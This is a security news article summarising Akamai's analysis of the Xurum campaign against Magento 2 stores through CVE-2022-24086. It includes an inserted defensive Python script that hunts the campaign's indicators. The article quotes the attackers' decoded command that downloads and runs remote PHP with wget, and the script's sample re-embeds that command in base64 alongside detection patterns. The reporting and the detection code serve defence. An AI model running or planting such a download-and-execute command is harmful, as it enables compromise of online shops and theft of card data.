Ongoing Xurum attacks target Magento 2 e-stores

Experts warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites using Adobe’s Magento 2 CMS.

Akamai researchers warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites running the Magento 2 CMS.

The attackers are actively exploiting a server-side template injection issue, tracked as CVE-2022-24086 (CVSS score: 9.8), in Adobe Commerce and Magento Open Source.

The name Xurum comes from the domain name of the attacker’s command and control (C2) server. 

The campaign has been active since at least January 2023; the threat actors appear to be interested in payment statistics from the orders placed in the victim's Magento store in the past 10 days.

In some cases, the attackers also deployed a software skimmer to capture credit card information and transmit it to a remote server.

Evidence gathered by the researchers suggests the attacks were carried out by a Russian threat actor.

The server xurum.com is physically located in the Netherlands and hosted by the Russian hosting company VDSina.ru.

The attackers were observed attempting to execute two distinct payloads from a total of four IP addresses associated with the infrastructure of Hetzner and Shock Hosting hosting providers.

The first variant of the payload executes the “file_get_contents” PHP function to send a request to the C2 (xurum.com) to determine whether the server is vulnerable to CVE-2022-24086.

The second variant is the second-stage PHP payload that is downloaded and executed by the attackers; it is hosted on the same xurum.com server.

“To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated using Base64 encoding and executed via the “shell_exec” PHP function (Figure 3). The obfuscated part decodes to php -r "`wget -qO- https://xurum.com/b.txt`;".” reads the analysis published by Akamai.

The researchers reported that the attackers register a new Magento component and mask it as “GoogleShoppingAds.” The threat actors were observed using an advanced web shell named “wso-ng” that is activated only when the attacker sends the cookie “magemojo000” to the backdoor “GoogleShoppingAds” component. 

According to the author, wso-ng is a new version of the WSO webshell.

The web shell login page masquerades as an error page containing a hidden login form that attempts to siphon victim credentials.

The attackers were observed creating a backdoor admin user in Magento, named “mageplaza” or “mageworx.” The attackers used these two names because they are also the names of popular Magento extension stores.
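A defender-side hunt for the indicators the report describes (the base64-hidden download command, the “magemojo000” activation cookie and the vendor-named admin users), written as an added example rather than code from Akamai or this page; the access-log format, function names and sample data are assumptions constructed for the example.

```python
import base64
import re

# Indicators quoted in the write-up above (C2 domain, activation cookie, backdoor
# admin names); function names, log format and sample data are constructed here.
C2_DOMAIN = "xurum.com"
WEBSHELL_COOKIE = "magemojo000"
BACKDOOR_ADMINS = {"mageplaza", "mageworx"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decoded_base64_hits(php_source):
    """Decode base64 blobs in PHP source; return plaintexts that mention
    the C2 domain, wget, or shell_exec."""
    hits = []
    for m in B64_RE.finditer(php_source):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:  # not valid base64, skip it
            continue
        if C2_DOMAIN in text or "wget" in text or "shell_exec" in text:
            hits.append(text)
    return hits

def requests_with_webshell_cookie(log_lines):
    """Return log lines whose logged Cookie header (assumed to be the last
    quoted field, e.g. Apache %{Cookie}i) carries the activation cookie."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"([^"]*)"\s*$', line)
        if not m:
            continue
        names = {c.split("=", 1)[0].strip() for c in m.group(1).split(";")}
        if WEBSHELL_COOKIE in names:
            flagged.append(line)
    return flagged

def suspicious_admin_accounts(admin_usernames):
    """Flag admin accounts named after the extension vendors the attackers imitate."""
    return sorted(u for u in admin_usernames if u.lower() in BACKDOOR_ADMINS)

# Constructed samples: a PHP fragment hiding the command quoted above, and two
# access-log lines that record the Cookie header as the final quoted field.
SAMPLE_PHP = '<?php $p = "' + base64.b64encode(b"wget -qO- https://xurum.com/b.txt").decode() + '";'
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Aug/2023:09:12:01 +0000] "GET / HTTP/1.1" 200 5120 "PHPSESSID=s1"',
    '203.0.113.9 - - [10/Aug/2023:09:12:44 +0000] "POST / HTTP/1.1" 200 311 "PHPSESSID=s2; magemojo000=1"',
]
```

Run the three functions over your own PHP tree, access logs and the Magento admin_user table export; a hit on any of them warrants a closer look at that store.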

Akamai researchers also observed on the xurum.com server a public exploit for CVE-2016-5195, aka Dirty COW, a Linux local privilege escalation flaw.

“The attackers have shown a meticulous approach, targeting specific Magento 2 instances rather than indiscriminately spraying their exploits across the internet. They demonstrate a high level of expertise in Magento and invest considerable time in understanding its internals, setting up attack infrastructure, and testing their exploits on real targets.” concludes the report. “This campaign serves as a practical example of how older vulnerabilities continue to be exploited years after disclosure, as businesses struggle to keep up with patches and security measures.”

The report also includes indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – hacking, Xurum Magento attacks)
